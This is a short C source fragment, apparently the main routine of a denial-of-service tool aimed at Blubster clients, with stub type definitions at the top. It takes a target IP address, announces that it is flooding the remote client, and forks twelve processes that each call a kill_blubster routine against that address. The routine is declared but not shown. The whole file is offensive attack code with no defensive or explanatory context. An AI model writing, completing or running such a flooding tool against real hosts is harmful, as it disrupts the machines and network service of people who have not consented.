
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int ending (char*) ;
 int exit (int ) ;
 int fork () ;
 int kill_blubster (char*) ;
 scalar_t__ prec ;
 int printf (char*,...) ;

int main(int argc, char **argv)
{

short i;

 prec = 0;

  if(argc < 2)
  {
    printf("\nUsage: %s <client-ip>\n", argv[0]);
    exit(0);
  }


prec=0;

printf ("\n\n+ DoS Started...\n");
printf("+ Flooding remote client...\n");


for (i=0; i<12; i++) if(!fork()) kill_blubster(argv[1]);

printf ("+ Ending...\n");

ending(argv[1]);

}
